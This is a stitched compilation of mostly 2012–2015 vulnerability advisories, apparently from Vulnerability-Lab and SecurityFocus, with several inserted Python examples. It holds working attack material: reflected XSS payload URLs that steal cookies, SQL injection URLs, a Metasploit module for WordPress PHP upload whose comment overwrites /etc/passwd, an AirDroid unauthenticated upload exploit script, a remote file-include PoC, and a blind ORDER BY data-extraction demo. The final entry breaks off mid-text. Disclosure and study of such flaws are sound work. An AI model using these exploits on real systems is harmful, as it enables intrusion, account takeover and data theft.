
Document Title:
===============
WK UDID v1.0.1 iOS - Command Inject Vulnerability


References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1539


Release Date:
=============
2015-07-01


Vulnerability Laboratory ID (VL-ID):
====================================
1539


Common Vulnerability Scoring System:
====================================
5.6


Product & Service Introduction:
===============================
This app offers the opportunity to read device-specific information from your iPhone, iPad or iPod touch. The desired information can be 
selected and sent via email to a recipient of your choice or it can be copied to the clipboard for later use. You can get information about 
the unique identifier (UDID), the model, the name and the operating system of your device.

(Copy of the Homepage https://itunes.apple.com/us/app/wk-udid/id392624227 )


Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research team discovered a local command inject web vulnerability in the official WK UDID v1.0.1 iOS mobile web-application.


Vulnerability Disclosure Timeline:
==================================
2015-07-01:	Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================
WK EDV GmbH
Product: WK UDID - iOS Mobile Web Application 1.0.1


Exploitation Technique:
=======================
Local


Severity Level:
===============
Medium


Technical Details & Description:
================================
A local command inject web vulnerability has been discovered in the official WK UDID v1.0.1 iOS mobile application.
The vulnerability allows local attackers to inject malicious script code into the application-side of the vulnerable mobile app.

The vulnerability is located in the device name value that the send-by-mail function copies into the generated report. Local attackers 
are able to manipulate the device name to compromise the mail function of the wkudid mobile app. The html encoding is broken in the 
send-by-mail export function: the device name is written into the mail header and html body without being encoded, so markup placed 
in the device name is rendered verbatim by the recipient's mail client. The attack vector of the vulnerability is application-side and 
the injection point is the device name in the iOS device settings.

The security risk of the local command inject vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 5.6. 
Exploitation of the vulnerability requires a low privileged iOS device user account with restricted access and no user interaction. 
Successful exploitation of the vulnerability results in attacker-controlled html or script code inside the mails the app sends, which 
can be used to manipulate what the recipient sees and to stage further attacks against the recipient's mail client.

Vulnerable Module(s)
				[+] Device - Settings - Information
 
Vulnerable Parameter(s)
				[+] device name

Affected Module(s)
				[+] WKUDID - Mail


Proof of Concept (PoC):
=======================
The local command inject web vulnerability can be exploited by local attackers with a low privileged device user account and without user interaction.
For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.

Manual steps to reproduce the vulnerability ...
1. Start the iOS device
2. Open the settings module and go to the device name
3. Change the name to the local command injection payload (see the PoC below)
4. Save the settings and start the wkudid application
5. Send the device details by mail
6. Review the mail in the recipient's inbox
7. The execution point is the mail header and the html body location holding the device name value
8. Successful reproduction of the local command inject security vulnerability!


PoC Device ID - Email

<div>Identifier (UDID): FFFFFFFFC0463E7B3E5D46A88EDF4194C74B27D1
<br>Model: iPad<br>Name: bkm337>"<./[LOCAL COMMAND INJECT VULNERABILITY VIA DEVICE NAME VALUE!]">%20<gt;<BR>
System Name: iPhone OS<BR>System Version: 8.3<BR>Total Memory (RAM): 987.98 MB<BR>
Free Memory: 19.06 MB<BR>Total Storage: 27.19 GB<BR>Free Storage: 0.70 GB<BR>
CPU Frequency: an error occured<BR>Network: WiFi<BR>Wi-Fi: 02:00:00:00:00:00<BR>
IP Address: 192.168.2.104<BR>Carrier: not available<BR></iframe></div>


Solution - Fix & Patch:
=======================
The vulnerability can be patched by securely parsing and encoding the device name value before it is written into the mail. Restrict the 
allowed input and html-encode the value in the generated html mail body and in the mail header, so that markup in the device name is 
rendered as text rather than interpreted by the recipient's mail client.
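Added example (not part of the advisory and not code from the WK UDID app, whose source is not public): a Python model of the broken export beside the fixed one. The field names, the sample UDID and the harmless iframe payload standing in for the original one are assumptions. It shows that html-encoding the device name is what keeps an injected tag from surviving into the mail body; the subject helper additionally strips CR/LF, a general mail-header hardening step the advisory does not mention.

```python
import html

# Constructed sample: the device fields the app copies into its mail, with the
# device name set to markup of the kind the PoC uses (not the original payload).
SAMPLE_DEVICE = {
    "Identifier (UDID)": "FFFFFFFFC0463E7B3E5D46A88EDF4194C74B27D1",
    "Model": "iPad",
    "Name": 'bkm337"><iframe src="http://attacker.example/">',
    "System Name": "iPhone OS",
    "System Version": "8.3",
}


def build_mail_vulnerable(device):
    """Mirrors the broken export: raw values concatenated into the html body."""
    rows = "".join("%s: %s<br>" % (k, v) for k, v in device.items())
    return "<div>%s</div>" % rows


def build_mail_fixed(device):
    """Hardened export: every value is html-encoded, so markup in the device
    name reaches the recipient as text, not as tags."""
    rows = "".join(
        "%s: %s<br>" % (html.escape(k, quote=True), html.escape(v, quote=True))
        for k, v in device.items()
    )
    return "<div>%s</div>" % rows


def mail_subject_fixed(device_name):
    """Header values must be single-line; CR/LF from a crafted device name are
    replaced so the name cannot add headers (assumed subject wording)."""
    return "Device info for " + device_name.replace("\r", " ").replace("\n", " ")


def contains_injected_tag(body, tag="iframe"):
    """Check a reviewer can run on a generated mail: does an attacker supplied
    tag survive as a real tag?"""
    return ("<%s" % tag) in body


if __name__ == "__main__":
    print("vulnerable body keeps the tag:", contains_injected_tag(build_mail_vulnerable(SAMPLE_DEVICE)))
    print("fixed body keeps the tag:     ", contains_injected_tag(build_mail_fixed(SAMPLE_DEVICE)))
    print(build_mail_fixed(SAMPLE_DEVICE))
```

The same encoding has to be applied wherever the name lands; a body that is encoded while the subject or a header still carries the raw value leaves the header injection point open.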


Security Risk:
==============
The security risk of the local command inject web vulnerability in the device name value is estimated as medium. (CVSS 5.6)


Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed 
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable 
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab 
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for 
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, 
policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains:    www.vulnerability-lab.com   	- www.vuln-lab.com			       		- www.evolution-sec.com
Contact:    admin@vulnerability-lab.com 	- research@vulnerability-lab.com 	       		- admin@evolution-sec.com
Section:    magazine.vulnerability-db.com	- vulnerability-lab.com/contact.php		       	- evolution-sec.com/contact
Social:	    twitter.com/#!/vuln_lab 		- facebook.com/VulnerabilityLab 	       		- youtube.com/user/vulnerability0lab
Feeds:	    vulnerability-lab.com/rss/rss.php	- vulnerability-lab.com/rss/rss_upcoming.php   		- vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php  	- vulnerability-lab.com/list-of-bug-bounty-programs.php	- vulnerability-lab.com/register/

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to 
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by 
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website 
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact 
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.

				Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]

-- 
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt
            
source: https://www.securityfocus.com/bid/54391/info

Kajona is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.

Kajona 3.4.1 is vulnerable; other versions may also be affected. 

http://www.example.com/index.php?page=contact&absender_name=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/index.php?page=contact&absender_email=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/index.php?page=contact&absender_nachricht=%3C/textarea%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/index.php?page=postacomment&comment_name=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/index.php?page=postacomment&comment_subject=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/index.php?page=postacomment&comment_message=%3C/textarea%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/index.php?module=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/index.php?module=login&admin=1&action=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/index.php?admin=1&module=user&action=list&pv=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/index.php?admin=1&module=user&action=list&pe=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/index.php?admin=1&module=user&action=newUser&user_username=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/index.php?admin=1&module=user&action=newUser&user_email=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/index.php?admin=1&module=user&action=newUser&user_forename=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/index.php?admin=1&module=user&action=newUser&user_name=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/index.php?admin=1&module=user&action=newUser&user_street=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/index.php?admin=1&module=user&action=newUser&user_postal=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/index.php?admin=1&module=user&action=newUser&user_city=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/index.php?admin=1&module=user&action=newUser&user_tel=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/index.php?admin=1&module=user&action=newUser&user_mobile=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/index.php?admin=1&module=user&action=groupNew&group_name=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/index.php?admin=1&module=user&action=groupNew&group_desc=%3C/textarea%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/index.php?admin=1&module=pages&action=newPage&name=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/index.php?admin=1&module=pages&action=newPage&browsername=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/index.php?admin=1&module=pages&action=newPage&seostring=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/index.php?admin=1&module=pages&action=newPage&keywords=%3C/textarea%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/index.php?admin=1&module=pages&action=newPage&folder_id=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/index.php?admin=1&module=pages&action=newElement&element_name=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/index.php?admin=1&module=pages&action=newElement&element_cachetime=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/index.php?admin=1&module=system&action=newAspect&aspect_name=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/index.php?admin=1&module=filemanager&action=newRepo&filemanager_name=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/index.php?admin=1&module=filemanager&action=newRepo&filemanager_path=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/index.php?admin=1&module=filemanager&action=newRepo&filemanager_upload_filter=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/index.php?admin=1&module=filemanager&action=newRepo&filemanager_view_filter=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/index.php?admin=1&module=downloads&action=newArchive&archive_title=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/index.php?admin=1&module=downloads&action=newArchive&archive_path=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
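Added example, not part of the SecurityFocus entry and not Kajona code: a small reflection probe in Python for URL lists like the one above. It pulls the markup-bearing parameters out of each probe URL, fetches the page through a caller-supplied function, and reports whether each payload comes back unencoded (exploitable), html-encoded (fixed) or not at all. The two response bodies are constructed stand-ins for a vulnerable and a patched contact form so the block runs offline; the same check applies to the other reflected-XSS URL lists on this page.

```python
import html
from urllib.parse import unquote_plus


def extract_payloads(url):
    """Map each query parameter carrying markup characters to its decoded value.
    Parsed by hand so a ';' inside a payload is never treated as a separator
    (older urllib.parse.parse_qsl split on ';' as well as '&')."""
    query = url.partition("?")[2].partition("#")[0]
    found = {}
    for pair in query.split("&"):
        if not pair:
            continue
        name, _, value = pair.partition("=")
        value = unquote_plus(value)
        if any(c in value for c in "<>\"'"):
            found[unquote_plus(name)] = value
    return found


def classify_reflection(body, payload):
    """'unencoded' if the payload is echoed exactly as sent (exploitable),
    'encoded' if only its html-escaped form appears (fixed), else 'absent'."""
    if payload in body:
        return "unencoded"
    if html.escape(payload, quote=True) in body:
        return "encoded"
    return "absent"


def probe(url, fetch):
    """fetch(url) -> response body text. Returns {parameter: classification}."""
    body = fetch(url)
    return {name: classify_reflection(body, value)
            for name, value in extract_payloads(url).items()}


# Constructed sample responses (no request leaves the machine).
PAYLOAD = '"><script>alert(document.cookie);</script>'
VULNERABLE_BODY = '<input name="absender_name" value="%s">' % PAYLOAD
FIXED_BODY = '<input name="absender_name" value="%s">' % html.escape(PAYLOAD, quote=True)

KAJONA_URL = ("http://www.example.com/index.php?page=contact&absender_name="
              "%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E")


def fetch_vulnerable(url):
    return VULNERABLE_BODY


def fetch_fixed(url):
    return FIXED_BODY


if __name__ == "__main__":
    print(probe(KAJONA_URL, fetch_vulnerable))  # {'absender_name': 'unencoded'}
    print(probe(KAJONA_URL, fetch_fixed))       # {'absender_name': 'encoded'}
```

Against a live target, pass something like `lambda u: requests.get(u).text` as `fetch`. A payload echoed inside a `<textarea>` or a JavaScript string is still reported as "unencoded" when it appears verbatim, which is the right call, since the `</textarea>` prefixed payloads in the list exist exactly to break out of that context.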
            
source: https://www.securityfocus.com/bid/54401/info

Phonalisa is prone to multiple HTML-injection, cross-site-scripting, and arbitrary code-execution vulnerabilities because the application fails to sufficiently sanitize user-supplied data.

Attackers can exploit these issues to execute arbitrary code in the context of the web server, compromise the affected application, or steal cookie-based authentication credentials from legitimate users of the site. Other attacks are also possible.

Phonalisa 5.0 is vulnerable; other versions may also be affected. 

http://www.example.com/?s=monitorqueues&sudo=su%22%3E%3Ciframe%20src=a%20onload=alert%28document.cookie%29%20%3C [XSS]

http://www.example.com/?s=monitorqueues&sudo=su%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C [XSS]

http://www.example.com/?s=home&m=home&sudo=%22%3E%3Cimg%20src=http://www.vuln-lab.com/images/200911/11/i8du12ievi9fh1a9rm-owned-headonfire.jpg%20onload=alert%28123%29;%20/%3E&setlang=en-us [XSS]

http://www.example.com/?s=home&m=home&sudo=%22%3E%3Cimg%20src=http://www.vuln-lab.com/images/200911/11/i8du12ievi9fh1a9rm-owned-headonfire.jpg%20/%3E&setlang=en-us [XSS]

http://www.example.com/?s=provphones&m=phones&sudo=su&mac=%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C&ip=127.0.0.1&pbx_id=%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C&phone_type=%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C [XSS]

http://www.example.com/&mac=%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C&sudo=su&section=%2Fprov%2Fcisco [XSS] 
            
source: https://www.securityfocus.com/bid/54440/info

The Generic Plugin for WordPress is prone to an arbitrary-file-upload vulnerability.

An attacker can exploit this issue to upload arbitrary PHP code and run it in the context of the Web server process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.

Generic Plugin 0.1 is vulnerable; other versions are also affected. 

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress Generic plugins Arbitrary File Upload',
      'Description'    => %q{
        This module exploits an arbitrary PHP file upload and code execution flaw in some
        WordPress plugins. A PHP payload is POSTed as multipart form data to the vulnerable
        upload script of the plugin and then requested from the upload directory to run it.
      },
      'Author'         => [ 'KedAns-Dz <ked-h[at]1337day.com>' ], # MSF Module
      'License'        => MSF_LICENSE,
      'Version'        => '0.1', # Beta Version Just for Pene-Test/Help - Wait the Best !
      'References'     =>
        [
          [ 'URL', 'http://1337day.com/related/18686' ],
          [ 'URL', 'http://packetstormsecurity.org/search/?q=wordpress+shell+upload' ]
        ],
      'Privileged'     => false,
      'Payload'        =>
        {
          'Compat' => { 'ConnectionType' => 'find' }
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        => [[ 'Automatic', { } ]],
      'DisclosureDate' => 'Jun 16 2012',
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('TARGETURI', [true, "The URI path to WordPress", "/"]),
        OptString.new('PLUGIN',    [true, "The URI path (below TARGETURI) to the vulnerable upload script", "/"]),
        OptString.new('UDP',       [true, "The URI path (below TARGETURI) of the directory files are stored in", "/"])
      ], self.class)
    # Example :
    # set RHOST 127.0.0.1
    # set TARGETURI /wp
    # set PLUGIN wp-content/plugins/foxypress/uploadify/uploadify.php
    # set UDP wp-content/affiliate_images/
    # set PAYLOAD php/exec
    # set CMD echo "toor::0:0:::/bin/bash">/etc/passwd
    # exploit
  end

  # Join URI segments with single slashes (the original concatenated them with
  # literal quote characters, which produced an invalid path)
  def join_uri(*parts)
    '/' + parts.map { |p| p.to_s.gsub(%r{^/+|/+$}, '') }.reject(&:empty?).join('/')
  end

  def check
    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => join_uri(datastore['TARGETURI'], datastore['PLUGIN'])
    })

    if res and res.code == 200
      return Exploit::CheckCode::Detected
    else
      return Exploit::CheckCode::Safe
    end
  end

  def exploit
    peer = "#{rhost}:#{rport}"

    # Multipart body carrying the PHP payload under the 'Filedata' field name
    # that uploadify-style handlers read
    post_data = Rex::MIME::Message.new
    post_data.add_part("<?php #{payload.encoded} ?>",
      "application/octet-stream", nil,
      "form-data; name=\"Filedata\"; filename=\"#{rand_text_alphanumeric(6)}.php\"")

    print_status("#{peer} - Sending PHP payload")

    res = send_request_cgi({
      'method' => 'POST',
      'uri'    => join_uri(datastore['TARGETURI'], datastore['PLUGIN']),
      'ctype'  => 'multipart/form-data; boundary=' + post_data.bound,
      'data'   => post_data.to_s
    })

    # The handler answers with JSON that carries the name the file was stored under
    if not res or res.code != 200 or res.body !~ /\{"raw_file_name":"(\w+)",/
      print_error("#{peer} - File wasn't uploaded, aborting!")
      return
    end
    file_name = $1

    print_good("#{peer} - Our payload is at: #{file_name}.php! Calling payload...")
    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => join_uri(datastore['TARGETURI'], datastore['UDP'], "#{file_name}.php")
    })

    if res and res.code != 200
      print_error("#{peer} - Server returned #{res.code.to_s}")
    end
  end

end
            
source: https://www.securityfocus.com/bid/54402/info

Funeral Script PHP is prone to multiple cross-site scripting vulnerabilities and multiple SQL-injection vulnerabilities because the application fails to sufficiently sanitize user-supplied input.

Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

SQL-injection:

http://www.example.com/funeral_script.php?hide_cat=[SQL-INJECTION]
http://www.example.com/funeralscript/admin.php?act=obituaries&orderType=[ASC/DESC]&search=&orderBy=[SQL-INJECTION]
http://www.example.com/funeralscript/admin.php?act=comments&obit_id=&orderType=[ASC/DESC]&search=&orderBy=[SQL-INJECTION]
http://www.example.com/funeralscript/admin.php?act=comments&obit_id=&orderType=[SQL-INJECTION]
http://www.example.com/funeralscript/admin.php?act=obituaries&orderType=[SQL-INJECTION]


Cross-site scripting:

http://www.example.com/funeralscript/admin.php?act=obituaries&orderType=[ASC/DESC]&search=&orderBy=[Cross Site Scripting]
http://www.example.com/funeralscript/admin.php?act=obituaries&orderType=[ASC/DESC]&search=[Cross Site Scripting]
http://www.example.com/funeralscript/admin.php?act=obituaries&orderType=[Cross Site Scripting]
http://www.example.com/funeralscript/admin.php?act=comments&obit_id=&orderType=[ASC/DESC]&search=&orderBy=[Cross Site Scripting]
http://www.example.com/funeralscript/admin.php?act=comments&obit_id=[Cross Site Scripting]&orderType=[ASC/DESC]&search=[Cross Site Scripting]
http://www.example.com/funeralscript/admin.php?act=comments&obit_id=&orderType=[Cross Site Scripting]
http://www.example.com/funeralscript/admin.php?act=comments&obit_id=-1%[Cross Site Scripting]
http://www.example.com/funeral_script.php?id=1&p=[Cross Site Scripting]%3C&search=[Cross Site Scripting]
http://www.example.com/funeral_script.php?hide_cat=[Cross Site Scripting]
            
#/IN THE NAME OF GOD
#/auth====PARSA ADIB

import sys
import requests

# Banner lines kept raw so the backslashes in the ASCII art are not read as escapes
BANNER = [
    r"       .__           .___             .__    .___",
    r"_____  |__|______  __| _/______  ____ |__| __| _/",
    r"\__  \ |  \_  __ \/ __ |\_  __ \/  _ \|  |/ __ | ",
    r" / __ \|  ||  | \/ /_/ | |  | \(  <_> )  / /_/ | ",
    r"(____  /__||__|  \____ | |__|   \____/|__\____ | ",
    r"     \/               \/                      \/ ",
    "AIRDROID VerAll UPLOAD AUTH BYPASS PoC @ Parsa Adib",
]


def logo():
    for line in BANNER:
        print("\t\t" + line)


if len(sys.argv) != 6:
    logo()
    print("\t\tUSAGE:python exploit.py ip port remote-file-name local-file-name remote-file-path")
    print("\t\tEXAMPLE:python exploit.py 192.168.1.2 8888 poc poc.txt /sdcard")
else:
    logo()
    base = "http://" + sys.argv[1] + ":" + sys.argv[2]
    print("\n[+]Receiving Details\n-----------------------------")
    try:
        # The ping endpoint answers without authentication with a JSON blob of device details
        p = requests.get(base + "/sdctl/comm/ping/")
    except IOError:
        print("\n[!] Check If server is Running")
        sys.exit()
    for i in p.text.split(","):
        for char in '{"}_':
            i = i.replace(char, "").upper()
        print("[*]" + i)
    print("\n[+]Sending File\n-----------------------------")
    try:
        # The upload endpoint also skips authentication: fn/fname name the remote file,
        # d is the remote directory it is written to
        with open(sys.argv[4], "rb") as fh:
            r = requests.post(base + "/sdctl/comm/upload/dir?fn=" + sys.argv[3] + "&d=" + sys.argv[5]
                              + "&after=1&fname=" + sys.argv[3],
                              files={sys.argv[4]: fh.read()})
        if r.status_code == 200:
            print("[*]RESPONSE:200")
            print("[*]FILE SENT SUCCESSFULLY")
    except IOError:
        print("\n[!] Error")
            
source: https://www.securityfocus.com/bid/54455/info

Event Calender PHP is prone to multiple input validation vulnerabilities.

Exploiting these vulnerabilities could allow an attacker to execute arbitrary script code, steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

Event Calender PHP 1.2 is vulnerable; other versions may also be affected. 

http://www.example.com/eventcalendar/admin.php?act=calendars&orderType=DESC&search=&orderBy=-1%27[SQL-INJECTION]cal_name&cal_id=2

http://www.example.com/eventcalendar/admin.php?act=calendars&orderType=-1%27[SQL-INJECTION]&search=&orderBy=cal_name&cal_id=2

http://www.example.com/eventcalendar/admin.php?act=events&orderType=ASC-1%27[SQL-INJECTION]&orderBy=event_title&cal_id=2

http://www.example.com/eventcalendar/admin.php?act=events&orderType=ASC&orderBy=-1%27[SQL-INJECTION]event_title&cal_id=2

http://www.example.com/preview.php?act=calendars&orderType=DESC&search=&orderBy=-1%27[SQL-INJECTION]cal_name&cal_id=2

http://www.example.com/eventcalendar/admin.php?act=newCal&cal_id=2

http://www.example.com/eventcalendar/admin.php?act=newEvent&cal_id=2

http://www.example.com/eventcalendar/preview.php?cal_id=%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C&cal_month=1&cal_year=0#oncal

http://www.example.com/eventcalendar/preview.php?cal_id=2&cal_month=%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C&cal_year=0#oncal

http://www.example.com/eventcalendar/preview.php?cal_id=2&cal_month=1&cal_year=%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C#oncal

http://www.example.com/eventcalendar/admin.php?act=%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C 
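Added example, not taken from Funeral Script PHP or Event Calender PHP (neither product's code appears on this page): it models the orderBy / orderType injection that both the Funeral Script list above and this one contain, against an assumed obituaries table in SQLite. Column names and sort directions are identifiers, so bound parameters cannot carry them; the vulnerable query interpolates them, the hardened one accepts only values from an allow list. The payload shows why this is not a harmless sort bug: a CASE expression inside ORDER BY turns the row order into a boolean oracle for data in another column.

```python
import sqlite3

ALLOWED_COLUMNS = {"obit_id", "name"}
ALLOWED_DIRECTIONS = {"ASC", "DESC"}


def make_db():
    """Assumed schema standing in for the real obituaries table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE obituaries (obit_id INTEGER, name TEXT, secret TEXT)")
    conn.executemany("INSERT INTO obituaries VALUES (?, ?, ?)",
                     [(1, "Alice", "k9"), (2, "Bob", "x4"), (3, "Carol", "p2")])
    return conn


def list_vulnerable(conn, order_by, order_type):
    """Mirrors the flaw: the sort parameters go straight into ORDER BY."""
    sql = "SELECT obit_id FROM obituaries ORDER BY %s %s" % (order_by, order_type)
    return [row[0] for row in conn.execute(sql)]


def list_safe(conn, order_by, order_type):
    """Hardened: identifiers are looked up in a fixed allow list, never echoed."""
    direction = order_type.upper()
    if order_by not in ALLOWED_COLUMNS or direction not in ALLOWED_DIRECTIONS:
        raise ValueError("rejected sort parameter")
    sql = "SELECT obit_id FROM obituaries ORDER BY %s %s" % (order_by, direction)
    return [row[0] for row in conn.execute(sql)]


def is_rejected(conn, order_by, order_type):
    try:
        list_safe(conn, order_by, order_type)
        return False
    except ValueError:
        return True


def oracle_payload(condition):
    """Boolean-blind ORDER BY payload: rows come back ascending when the
    condition holds and descending when it does not."""
    return "(CASE WHEN (%s) THEN obit_id ELSE -obit_id END)" % condition


if __name__ == "__main__":
    conn = make_db()
    guess = "(SELECT substr(secret,1,1) FROM obituaries WHERE obit_id=1)='%s'"
    print(list_vulnerable(conn, oracle_payload(guess % "k"), "ASC"))  # [1, 2, 3]: first char is 'k'
    print(list_vulnerable(conn, oracle_payload(guess % "z"), "ASC"))  # [3, 2, 1]: it is not 'z'
    print(is_rejected(conn, oracle_payload(guess % "k"), "ASC"))      # True
```

Repeating the guess over the alphabet and over each position of `secret` extracts the column one character per request, which is why ORDER BY sinks deserve the same treatment as WHERE clauses. MySQL, which these PHP products normally target, accepts the same CASE construct.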
            
source: https://www.securityfocus.com/bid/54452/info

Elite Bulletin Board is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query.

A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.

Elite Bulletin Board 2.1.19 is vulnerable; other versions may also be affected 

http://www.example.com/ebbv2/groups.php?id=%5c&mode=view
http://www.example.com/ebbv2/rssfeed.php?bid=%5c
http://www.example.com/ebbv2/viewboard.php?bid=%5c 
            
source: https://www.securityfocus.com/bid/54459/info

The Post Recommendations plug-in for WordPress is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied input.

Exploiting this issue could allow an attacker to compromise the application and the underlying system; other attacks are also possible.

Post Recommendations 1.1.2 is vulnerable; other versions may also be affected. 

PostShell.php
<?php

$ch = curl_init("http://localhost/wordpress/wp-content/plugins/post-recommendations-for-wordpress/lib/api.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, array('abspath'=>"http://localhost/lo.txt\0"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);

print "$postResult";

?>


lo.txt
<?php phpinfo(); ?>
            
source: https://www.securityfocus.com/bid/54456/info

Simple Machines is prone to multiple HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content.

Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected application, potentially allowing the attacker to steal cookie-based authentication credentials or control how the site is rendered to the user. Other attacks are also possible.

Simple Machines Forum 2.0.2 is vulnerable; other versions may also be affected. 

Proof of Concept:
=================
The persistent input validation vulnerability can be exploited by a remote attacker with a low privileged user account and low required 
user interaction. For demonstration or to reproduce ...

Review: Package Manager > Download New Packages > FTP Information Required (Listing)

<dd>
<input size="30" name="ftp_server" id="ftp_server" type="text"><[PERSISTENT SCRIPT CODE]' <"="" class="input_text">
<label for="ftp_port">Port:&nbsp;</label> 
<input type="text" size="3" name="ftp_port" id="ftp_port" value="21" 
class="input_text" />

... or


<dd>
<input size="50" name="ftp_path" id="ftp_path" value="public_html/demo/smf " 
type="text"><[PERSISTENT SCRIPT CODE])' <"="" style="width: 99%;" class="input_text">
</dd>
</dl>
<div class="righttext">


URL: http://www.example.com/smf/index.php?action=admin;area=packages;sa=packageget;get;f5073d7837d8=5a2bdd540a245be265f26c102fff9626



Review: Smiley Sets > Add

<tr class="windowbg" id="list_smiley_set_list_0">
<td style="text-align: center;"></td>
<td class="windowbg">Akyhne's Set</td>
